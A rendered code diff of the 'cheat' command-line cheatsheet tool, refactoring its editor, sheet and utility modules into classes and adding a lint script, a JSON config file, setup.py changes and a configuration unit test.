||||||
|
""" Determines the user's preferred editor """
|
||||||
|
|
||||||
|
# assert that the editor is set
|
||||||
|
if not self._config.cheat_editor:
|
||||||
|
Utils.die(
|
||||||
|
'You must set a CHEAT_EDITOR, VISUAL, or EDITOR environment '
|
||||||
|
'variable or setting in order to create/edit a cheatsheet.'
|
||||||
|
)
|
||||||
|
|
||||||
|
return self._config.cheat_editor
|
||||||
|
|
||||||
|
def open(self, filepath):
|
||||||
|
""" Open `filepath` using the EDITOR specified by the env variables """
|
||||||
|
editor_cmd = self.editor().split()
|
||||||
|
try:
|
||||||
|
subprocess.call(editor_cmd + [filepath])
|
||||||
|
except OSError:
|
||||||
|
Utils.die('Could not launch ' + self.editor())
|
@ -1,76 +1,64 @@
|
|||||||
|
from cheat.editor import Editor
|
||||||
|
from cheat.utils import Utils
|
||||||
|
import io
|
||||||
import os
|
import os
|
||||||
import shutil
|
import shutil
|
||||||
|
|
||||||
from cheat import sheets
|
|
||||||
from cheat.utils import die, open_with_editor
|
|
||||||
|
|
||||||
def copy(current_sheet_path, new_sheet_path):
|
class Sheet:
|
||||||
""" Copies a sheet to a new path """
|
|
||||||
|
|
||||||
# attempt to copy the sheet to DEFAULT_CHEAT_DIR
|
def __init__(self, config, sheets):
|
||||||
try:
|
self._config = config
|
||||||
shutil.copy(current_sheet_path, new_sheet_path)
|
self._editor = Editor(config)
|
||||||
|
self._sheets = sheets
|
||||||
|
|
||||||
# fail gracefully if the cheatsheet cannot be copied. This can happen if
|
def _exists(self, sheet):
|
||||||
# DEFAULT_CHEAT_DIR does not exist
|
""" Predicate that returns true if the sheet exists """
|
||||||
except IOError:
|
return (sheet in self._sheets.get() and
|
||||||
die('Could not copy cheatsheet for editing.')
|
os.access(self._path(sheet), os.R_OK))
|
||||||
|
|
||||||
|
def _exists_in_default_path(self, sheet):
|
||||||
|
""" Predicate that returns true if the sheet exists in default_path"""
|
||||||
|
default_path = os.path.join(self._config.cheat_user_dir, sheet)
|
||||||
|
return (sheet in self._sheets.get() and
|
||||||
|
os.access(default_path, os.R_OK))
|
||||||
|
|
||||||
def create_or_edit(sheet):
|
def _path(self, sheet):
|
||||||
|
""" Returns a sheet's filesystem path """
|
||||||
|
return self._sheets.get()[sheet]
|
||||||
|
|
||||||
|
def edit(self, sheet):
|
||||||
""" Creates or edits a cheatsheet """
|
""" Creates or edits a cheatsheet """
|
||||||
|
|
||||||
# if the cheatsheet does not exist
|
# if the cheatsheet does not exist
|
||||||
if not exists(sheet):
|
if not self._exists(sheet):
|
||||||
create(sheet)
|
new_path = os.path.join(self._config.cheat_user_dir, sheet)
|
||||||
|
self._editor.open(new_path)
|
||||||
|
|
||||||
# if the cheatsheet exists but not in the default_path, copy it to the
|
# if the cheatsheet exists but not in the default_path, copy it to the
|
||||||
# default path before editing
|
# default path before editing
|
||||||
elif exists(sheet) and not exists_in_default_path(sheet):
|
elif self._exists(sheet) and not self._exists_in_default_path(sheet):
|
||||||
copy(path(sheet), os.path.join(sheets.default_path(), sheet))
|
try:
|
||||||
edit(sheet)
|
shutil.copy(
|
||||||
|
self._path(sheet),
|
||||||
|
os.path.join(self._config.cheat_user_dir, sheet)
|
||||||
|
)
|
||||||
|
|
||||||
|
# fail gracefully if the cheatsheet cannot be copied. This can
|
||||||
|
# happen if CHEAT_USER_DIR does not exist
|
||||||
|
except IOError:
|
||||||
|
Utils.die('Could not copy cheatsheet for editing.')
|
||||||
|
|
||||||
|
self._editor.open(self._path(sheet))
|
||||||
|
|
||||||
# if it exists and is in the default path, then just open it
|
# if it exists and is in the default path, then just open it
|
||||||
else:
|
else:
|
||||||
edit(sheet)
|
self._editor.open(self._path(sheet))
|
||||||
|
|
||||||
|
def read(self, sheet):
|
||||||
def create(sheet):
|
|
||||||
""" Creates a cheatsheet """
|
|
||||||
new_sheet_path = os.path.join(sheets.default_path(), sheet)
|
|
||||||
open_with_editor(new_sheet_path)
|
|
||||||
|
|
||||||
|
|
||||||
def edit(sheet):
|
|
||||||
""" Opens a cheatsheet for editing """
|
|
||||||
open_with_editor(path(sheet))
|
|
||||||
|
|
||||||
|
|
||||||
def exists(sheet):
|
|
||||||
""" Predicate that returns true if the sheet exists """
|
|
||||||
return sheet in sheets.get() and os.access(path(sheet), os.R_OK)
|
|
||||||
|
|
||||||
|
|
||||||
def exists_in_default_path(sheet):
|
|
||||||
""" Predicate that returns true if the sheet exists in default_path"""
|
|
||||||
default_path_sheet = os.path.join(sheets.default_path(), sheet)
|
|
||||||
return sheet in sheets.get() and os.access(default_path_sheet, os.R_OK)
|
|
||||||
|
|
||||||
|
|
||||||
def is_writable(sheet):
|
|
||||||
""" Predicate that returns true if the sheet is writeable """
|
|
||||||
return sheet in sheets.get() and os.access(path(sheet), os.W_OK)
|
|
||||||
|
|
||||||
|
|
||||||
def path(sheet):
|
|
||||||
""" Returns a sheet's filesystem path """
|
|
||||||
return sheets.get()[sheet]
|
|
||||||
|
|
||||||
|
|
||||||
def read(sheet):
|
|
||||||
""" Returns the contents of the cheatsheet as a String """
|
""" Returns the contents of the cheatsheet as a String """
|
||||||
if not exists(sheet):
|
if not self._exists(sheet):
|
||||||
die('No cheatsheet found for ' + sheet)
|
Utils.die('No cheatsheet found for ' + sheet)
|
||||||
|
|
||||||
with open(path(sheet)) as cheatfile:
|
with io.open(self._path(sheet), encoding='utf-8') as cheatfile:
|
||||||
return cheatfile.read()
|
return cheatfile.read()
|
||||||
|
@ -1,42 +1,34 @@
|
|||||||
|
from cheat.colorize import Colorize
|
||||||
|
from cheat.utils import Utils
|
||||||
|
import io
|
||||||
import os
|
import os
|
||||||
|
|
||||||
from cheat import cheatsheets
|
|
||||||
from cheat.utils import die
|
|
||||||
|
|
||||||
def default_path():
|
class Sheets:
|
||||||
""" Returns the default cheatsheet path """
|
|
||||||
|
|
||||||
# determine the default cheatsheet dir
|
def __init__(self, config):
|
||||||
default_sheets_dir = os.environ.get('DEFAULT_CHEAT_DIR') or os.path.join('~', '.cheat')
|
self._config = config
|
||||||
default_sheets_dir = os.path.expanduser(os.path.expandvars(default_sheets_dir))
|
self._colorize = Colorize(config)
|
||||||
|
|
||||||
# create the DEFAULT_CHEAT_DIR if it does not exist
|
# Assembles a dictionary of cheatsheets as name => file-path
|
||||||
if not os.path.isdir(default_sheets_dir):
|
self._sheets = {}
|
||||||
try:
|
sheet_paths = [
|
||||||
# @kludge: unclear on why this is necessary
|
config.cheat_user_dir
|
||||||
os.umask(0000)
|
]
|
||||||
os.mkdir(default_sheets_dir)
|
|
||||||
|
|
||||||
except OSError:
|
# merge the CHEAT_PATH paths into the sheet_paths
|
||||||
die('Could not create DEFAULT_CHEAT_DIR')
|
if config.cheat_path:
|
||||||
|
for path in config.cheat_path.split(os.pathsep):
|
||||||
|
if os.path.isdir(path):
|
||||||
|
sheet_paths.append(path)
|
||||||
|
|
||||||
# assert that the DEFAULT_CHEAT_DIR is readable and writable
|
if not sheet_paths:
|
||||||
if not os.access(default_sheets_dir, os.R_OK):
|
Utils.die('The CHEAT_USER_DIR dir does not exist '
|
||||||
die('The DEFAULT_CHEAT_DIR (' + default_sheets_dir +') is not readable.')
|
+ 'or the CHEAT_PATH is not set.')
|
||||||
if not os.access(default_sheets_dir, os.W_OK):
|
|
||||||
die('The DEFAULT_CHEAT_DIR (' + default_sheets_dir +') is not writable.')
|
|
||||||
|
|
||||||
# return the default dir
|
|
||||||
return default_sheets_dir
|
|
||||||
|
|
||||||
|
|
||||||
def get():
|
|
||||||
""" Assembles a dictionary of cheatsheets as name => file-path """
|
|
||||||
cheats = {}
|
|
||||||
|
|
||||||
# otherwise, scan the filesystem
|
# otherwise, scan the filesystem
|
||||||
for cheat_dir in reversed(paths()):
|
for cheat_dir in reversed(sheet_paths):
|
||||||
cheats.update(
|
self._sheets.update(
|
||||||
dict([
|
dict([
|
||||||
(cheat, os.path.join(cheat_dir, cheat))
|
(cheat, os.path.join(cheat_dir, cheat))
|
||||||
for cheat in os.listdir(cheat_dir)
|
for cheat in os.listdir(cheat_dir)
|
||||||
@ -45,47 +37,39 @@ def get():
|
|||||||
])
|
])
|
||||||
)
|
)
|
||||||
|
|
||||||
return cheats
|
def directories(self):
|
||||||
|
|
||||||
|
|
||||||
def paths():
|
|
||||||
""" Assembles a list of directories containing cheatsheets """
|
""" Assembles a list of directories containing cheatsheets """
|
||||||
sheet_paths = [
|
sheet_paths = [
|
||||||
default_path(),
|
self._config.cheat_user_dir,
|
||||||
cheatsheets.sheets_dir()[0],
|
|
||||||
]
|
]
|
||||||
|
|
||||||
# merge the CHEATPATH paths into the sheet_paths
|
# merge the CHEATPATH paths into the sheet_paths
|
||||||
if 'CHEATPATH' in os.environ and os.environ['CHEATPATH']:
|
for path in self._config.cheat_path.split(os.pathsep):
|
||||||
for path in os.environ['CHEATPATH'].split(os.pathsep):
|
|
||||||
if os.path.isdir(path):
|
|
||||||
sheet_paths.append(path)
|
sheet_paths.append(path)
|
||||||
|
|
||||||
if not sheet_paths:
|
|
||||||
die('The DEFAULT_CHEAT_DIR dir does not exist or the CHEATPATH is not set.')
|
|
||||||
|
|
||||||
return sheet_paths
|
return sheet_paths
|
||||||
|
|
||||||
|
def get(self):
|
||||||
|
""" Returns a dictionary of cheatsheets as name => file-path """
|
||||||
|
return self._sheets
|
||||||
|
|
||||||
def list():
|
def list(self):
|
||||||
""" Lists the available cheatsheets """
|
""" Lists the available cheatsheets """
|
||||||
sheet_list = ''
|
sheet_list = ''
|
||||||
pad_length = max([len(x) for x in get().keys()]) + 4
|
pad_length = max([len(x) for x in self.get().keys()]) + 4
|
||||||
for sheet in sorted(get().items()):
|
for sheet in sorted(self.get().items()):
|
||||||
sheet_list += sheet[0].ljust(pad_length) + sheet[1] + "\n"
|
sheet_list += sheet[0].ljust(pad_length) + sheet[1] + "\n"
|
||||||
return sheet_list
|
return sheet_list
|
||||||
|
|
||||||
|
def search(self, term):
|
||||||
def search(term):
|
|
||||||
""" Searches all cheatsheets for the specified term """
|
""" Searches all cheatsheets for the specified term """
|
||||||
result = ''
|
result = ''
|
||||||
lowered_term = term.lower()
|
|
||||||
|
|
||||||
for cheatsheet in sorted(get().items()):
|
for cheatsheet in sorted(self.get().items()):
|
||||||
match = ''
|
match = ''
|
||||||
for line in open(cheatsheet[1]):
|
for line in io.open(cheatsheet[1], encoding='utf-8'):
|
||||||
if lowered_term in line.lower():
|
if term in line:
|
||||||
match += ' ' + line
|
match += ' ' + self._colorize.search(term, line)
|
||||||
|
|
||||||
if match != '':
|
if match != '':
|
||||||
result += cheatsheet[0] + ":\n" + match + "\n"
|
result += cheatsheet[0] + ":\n" + match + "\n"
|
||||||
|
@ -1,71 +1,26 @@
|
|||||||
from __future__ import print_function
|
from __future__ import print_function
|
||||||
import os
|
|
||||||
import sys
|
import sys
|
||||||
import subprocess
|
|
||||||
|
|
||||||
|
|
||||||
def colorize(sheet_content):
|
class Utils:
|
||||||
""" Colorizes cheatsheet content if so configured """
|
|
||||||
|
|
||||||
# only colorize if so configured
|
@staticmethod
|
||||||
if not 'CHEATCOLORS' in os.environ:
|
def die(message):
|
||||||
return sheet_content
|
|
||||||
|
|
||||||
try:
|
|
||||||
from pygments import highlight
|
|
||||||
from pygments.lexers import get_lexer_by_name
|
|
||||||
from pygments.formatters import TerminalFormatter
|
|
||||||
|
|
||||||
# if pygments can't load, just return the uncolorized text
|
|
||||||
except ImportError:
|
|
||||||
return sheet_content
|
|
||||||
|
|
||||||
first_line = sheet_content.splitlines()[0]
|
|
||||||
lexer = get_lexer_by_name('bash')
|
|
||||||
if first_line.startswith('```'):
|
|
||||||
sheet_content = '\n'.join(sheet_content.split('\n')[1:-2])
|
|
||||||
try:
|
|
||||||
lexer = get_lexer_by_name(first_line[3:])
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
|
|
||||||
return highlight(sheet_content, lexer, TerminalFormatter())
|
|
||||||
|
|
||||||
|
|
||||||
def die(message):
|
|
||||||
""" Prints a message to stderr and then terminates """
|
""" Prints a message to stderr and then terminates """
|
||||||
warn(message)
|
Utils.warn(message)
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
def editor():
|
def warn(message):
|
||||||
""" Determines the user's preferred editor """
|
|
||||||
|
|
||||||
# determine which editor to use
|
|
||||||
editor = os.environ.get('CHEAT_EDITOR') \
|
|
||||||
or os.environ.get('VISUAL') \
|
|
||||||
or os.environ.get('EDITOR') \
|
|
||||||
or False
|
|
||||||
|
|
||||||
# assert that the editor is set
|
|
||||||
if editor == False:
|
|
||||||
die(
|
|
||||||
'You must set a CHEAT_EDITOR, VISUAL, or EDITOR environment '
|
|
||||||
'variable in order to create/edit a cheatsheet.'
|
|
||||||
)
|
|
||||||
|
|
||||||
return editor
|
|
||||||
|
|
||||||
|
|
||||||
def open_with_editor(filepath):
|
|
||||||
""" Open `filepath` using the EDITOR specified by the environment variables """
|
|
||||||
editor_cmd = editor().split()
|
|
||||||
try:
|
|
||||||
subprocess.call(editor_cmd + [filepath])
|
|
||||||
except OSError:
|
|
||||||
die('Could not launch ' + editor())
|
|
||||||
|
|
||||||
|
|
||||||
def warn(message):
|
|
||||||
""" Prints a message to stderr """
|
""" Prints a message to stderr """
|
||||||
print((message), file=sys.stderr)
|
print((message), file=sys.stderr)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def boolify(value):
|
||||||
|
""" Type-converts 'true' and 'false' to Booleans """
|
||||||
|
# if `value` is not a string, return it as-is
|
||||||
|
if not isinstance(value, str):
|
||||||
|
return value
|
||||||
|
|
||||||
|
# otherwise, convert "true" and "false" to Boolean counterparts
|
||||||
|
return value.strip().lower() == "true"
|
||||||
|
10
ci/lint.sh
Executable file
10
ci/lint.sh
Executable file
@ -0,0 +1,10 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
|
||||||
|
# Resolve the app root
|
||||||
|
SCRIPT=`realpath $0`
|
||||||
|
SCRIPTPATH=`dirname $SCRIPT`
|
||||||
|
APPROOT=`realpath "$SCRIPTPATH/.."`
|
||||||
|
|
||||||
|
flake8 $APPROOT/setup.py
|
||||||
|
flake8 $APPROOT/bin/cheat
|
||||||
|
flake8 $APPROOT/cheat/*.py
|
6
config/cheat
Normal file
6
config/cheat
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
{
|
||||||
|
"CHEAT_COLORS" : true,
|
||||||
|
"CHEAT_COLORSCHEME" : "light",
|
||||||
|
"CHEAT_EDITOR" : "vi",
|
||||||
|
"CHEAT_PATH" : "/usr/share/cheat"
|
||||||
|
}
|
42
setup.py
42
setup.py
@ -1,28 +1,40 @@
|
|||||||
from distutils.core import setup
|
from distutils.core import setup
|
||||||
import os
|
import os
|
||||||
|
|
||||||
|
# determine the directory in which to install system-wide cheatsheets
|
||||||
|
# KLUDGE: It would be better to read `/usr/share/cheat` from `config/cheat`
|
||||||
|
# rather than hard-coding it here
|
||||||
|
cheat_path = os.environ.get('CHEAT_PATH') or '/usr/share/cheat'
|
||||||
|
|
||||||
|
# aggregate the systme-wide cheatsheets
|
||||||
|
cheat_files = []
|
||||||
|
for f in os.listdir('cheat/cheatsheets/'):
|
||||||
|
cheat_files.append(os.path.join('cheat/cheatsheets/', f))
|
||||||
|
|
||||||
|
# specify build params
|
||||||
setup(
|
setup(
|
||||||
name = 'cheat',
|
name='cheat',
|
||||||
version = '2.3.1',
|
version='2.5.1',
|
||||||
author = 'Chris Lane',
|
author='Chris Lane',
|
||||||
author_email = 'chris@chris-allen-lane.com',
|
author_email='chris@chris-allen-lane.com',
|
||||||
license = 'GPL3',
|
license='GPL3',
|
||||||
description = 'cheat allows you to create and view interactive cheatsheets '
|
description='cheat allows you to create and view interactive cheatsheets '
|
||||||
'on the command-line. It was designed to help remind *nix system '
|
'on the command-line. It was designed to help remind *nix system '
|
||||||
'administrators of options for commands that they use frequently, but not '
|
'administrators of options for commands that they use frequently, but not '
|
||||||
'frequently enough to remember.',
|
'frequently enough to remember.',
|
||||||
url = 'https://github.com/chrisallenlane/cheat',
|
url='https://github.com/chrisallenlane/cheat',
|
||||||
packages = [
|
packages=[
|
||||||
'cheat',
|
'cheat',
|
||||||
'cheat.cheatsheets',
|
|
||||||
'cheat.test',
|
'cheat.test',
|
||||||
],
|
],
|
||||||
package_data = {
|
scripts=['bin/cheat'],
|
||||||
'cheat.cheatsheets': [f for f in os.listdir('cheat/cheatsheets') if '.' not in f]
|
install_requires=[
|
||||||
},
|
|
||||||
scripts = ['bin/cheat'],
|
|
||||||
install_requires = [
|
|
||||||
'docopt >= 0.6.1',
|
'docopt >= 0.6.1',
|
||||||
'pygments >= 1.6.0',
|
'pygments >= 1.6.0',
|
||||||
]
|
'termcolor >= 1.1.0',
|
||||||
|
],
|
||||||
|
data_files=[
|
||||||
|
(cheat_path, cheat_files),
|
||||||
|
('/etc', ['config/cheat']),
|
||||||
|
],
|
||||||
)
|
)
|
||||||
|
86
tests/test_configuration.py
Normal file
86
tests/test_configuration.py
Normal file
@ -0,0 +1,86 @@
|
|||||||
|
import unittest2
|
||||||
|
import os
|
||||||
|
import shutil
|
||||||
|
from cheat.configuration import Configuration
|
||||||
|
|
||||||
|
|
||||||
|
def _set_loc_conf(key, value):
|
||||||
|
_path = os.path.dirname(os.path.abspath(__file__)) + '/home/.config/cheat/cheat'
|
||||||
|
if value == None:
|
||||||
|
os.remove(_path)
|
||||||
|
else:
|
||||||
|
if not os.path.exists(os.path.dirname(_path)):
|
||||||
|
os.makedirs(os.path.dirname(_path))
|
||||||
|
f = open(_path,"w+")
|
||||||
|
f.write('{"'+ key +'":"'+ value +'"}')
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
|
||||||
|
def _set_glob_conf(key, value):
|
||||||
|
_path = os.path.dirname(os.path.abspath(__file__))+ "/etc/cheat"
|
||||||
|
if value == None:
|
||||||
|
os.remove(_path)
|
||||||
|
else:
|
||||||
|
if not os.path.exists(os.path.dirname(_path)):
|
||||||
|
os.mkdir(os.path.dirname(_path))
|
||||||
|
f = open(_path,"w+")
|
||||||
|
f.write('{"'+ key +'":"'+ value +'"}' )
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
|
||||||
|
def _set_env_var(key, value):
|
||||||
|
if value == None:
|
||||||
|
del os.environ[key]
|
||||||
|
else:
|
||||||
|
os.environ[key] = value
|
||||||
|
|
||||||
|
|
||||||
|
def _configuration_key_test(TestConfiguration, key,values, conf_get_method):
|
||||||
|
for glob_conf in values:
|
||||||
|
_set_glob_conf(key,glob_conf)
|
||||||
|
for loc_conf in values:
|
||||||
|
_set_loc_conf(key,loc_conf)
|
||||||
|
for env_conf in values:
|
||||||
|
_set_env_var(key,env_conf)
|
||||||
|
if env_conf:
|
||||||
|
TestConfiguration.assertEqual(conf_get_method(Configuration()),env_conf)
|
||||||
|
elif loc_conf:
|
||||||
|
TestConfiguration.assertEqual(conf_get_method(Configuration()),loc_conf)
|
||||||
|
elif glob_conf:
|
||||||
|
TestConfiguration.assertEqual(conf_get_method(Configuration()),glob_conf)
|
||||||
|
else:
|
||||||
|
TestConfiguration.assertEqual(conf_get_method(Configuration()),None)
|
||||||
|
|
||||||
|
|
||||||
|
class ConfigurationTestCase(unittest2.TestCase):
|
||||||
|
|
||||||
|
|
||||||
|
def setUp(self):
|
||||||
|
os.environ['CHEAT_GLOBAL_CONF_PATH'] = os.path.dirname(os.path.abspath(__file__)) \
|
||||||
|
+ '/etc/cheat'
|
||||||
|
os.environ['CHEAT_LOCAL_CONF_PATH'] = os.path.dirname(os.path.abspath(__file__)) \
|
||||||
|
+ '/home/.config/cheat/cheat'
|
||||||
|
|
||||||
|
|
||||||
|
def test_get_editor(self):
|
||||||
|
_configuration_key_test(self,"EDITOR",["nano","vim","gedit",None],
|
||||||
|
Configuration.get_editor)
|
||||||
|
|
||||||
|
|
||||||
|
def test_get_cheatcolors(self):
|
||||||
|
_configuration_key_test(self,"CHEATCOLORS",["true",None],
|
||||||
|
Configuration.get_cheatcolors)
|
||||||
|
|
||||||
|
|
||||||
|
def test_get_cheatpath(self):
|
||||||
|
_configuration_key_test(self,"CHEATPATH",["/etc/myglobalcheats",
|
||||||
|
"/etc/anotherglobalcheats","/rootcheats",None],Configuration.get_cheatpath)
|
||||||
|
|
||||||
|
|
||||||
|
def test_get_defaultcheatdir(self):
|
||||||
|
_configuration_key_test(self,"DEFAULT_CHEAT_DIR",["/etc/myglobalcheats",
|
||||||
|
"/etc/anotherglobalcheats","/rootcheats",None],Configuration.get_default_cheat_dir)
|
||||||
|
|
||||||
|
def tearDown(self):
|
||||||
|
shutil.rmtree(os.path.dirname(os.path.abspath(__file__)) +'/etc')
|
||||||
|
shutil.rmtree(os.path.dirname(os.path.abspath(__file__)) +'/home')
|
Reference in New Issue
Block a user